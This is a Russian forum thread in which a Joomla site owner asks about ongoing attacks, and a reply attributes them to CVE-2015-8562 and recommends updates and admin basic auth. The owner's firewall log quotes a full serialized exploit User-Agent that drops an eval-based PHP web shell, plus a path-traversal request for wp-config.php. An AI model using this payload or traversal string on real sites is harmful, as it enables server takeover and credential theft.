Попытки взломать сайт
Страницы: 1
Попытки взломать сайт, CMS Joomla
Приветствую всех! Проблема такая: где-то пол года взломали сайт. Недавно решил восстановить сайт с нуля (на том же домене), однако после его восстановления атаки на сайт не прикратились. На сайте стоит компонент Rsfirewall, который ежедневно сообщает об опасности среднего уровня. Некоторые сообщения говорят о том, что на сайт пытались зайти используя неправильный логи/пароль. Другие указывает на то, что была попытка локального включения файла (более подробная информация - URI: download=../../../wp-config.php
Совпадение: ./ ). И ещё одни сообщения говорят об обнаружении опасного пользовательского агента:

Код
Пользовательский агент: 
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:253:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."images".chr(47)."404.php","|=|\x3C".chr(63)."php
 
\x24mujj=\x24_POST['@123'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~
               
 


 Я баню IP через которые происходят атаки (и вообще внёс в чёрный список почти все страны), но атаки не прекращаются с других адресов. Что это за атаки и как возможно максимально обезопасить себя от них?

Комплексное SEO продвижение в поисковых системах Яндекс, Google

Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу. 
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера. 

Добавьте basic авторизацию на админку
Цитата
siteclean пишет:
Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу.
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера.

Добавьте basic авторизацию на админку
Спасибо! Не подскажите как сделать такую авторизацию?
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
09:27 Edu-Money - новая партнёрка под бурж EDU траф. 55-70% за заказ! Средний чек от $100! 
07:27 Favicon в google не меняется уже более 6 месяцев 
00:19 Ошибка после размещения кода HTML! 
20:51 Bropush - твой бро в монетизации сайта push-уведомлениями 
18:04 [b]Webvork [/b]- международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:53 Golden Goose - WAP Click партнерка с inhouse офферами 
15:14 Adtrafico - Правильная партнёрская сеть под бурж трафик 
19:16 anyexchange.best - обменный пункт электронных валют AnyExchange 
17:33 OkSender – программа для продвижения в социальной сети Одноклассники. 
17:07 Профессиональное ведение каналов в Ютубе, Белое продвижение, Услуги в соц. сетях 
15:18 100 ссылок с ИКС + бонус всего за 500 рублей! Ручная работа. Не упусти свой Шанс! 
14:12 Покупаем/Продаем криптовалюты за наличные 
12:49 Litex.pro обмен валюты с минимальной комиссией 
12:38 Копирайтер уникальных текстов 
09:49 Заработок на ставках 
11:02 Сервис услуг в YouTube, Вконтакте, Instagram, Twitter, Facebook, Одноклассники, Google+ 
17:56 Marketcall - международная партнерская сеть с оплатой Pay Per Call и LeadGen 
07:15 Обмен крипты 
11:22 Кому пришла выплата с AdSense? 
10:39 Как бороться с дерьморекламной Adsensa? Ну сил уже нет... 
22:51 Самозанятым предложат регистрироваться на маркетплейсах и агрегаторах услуг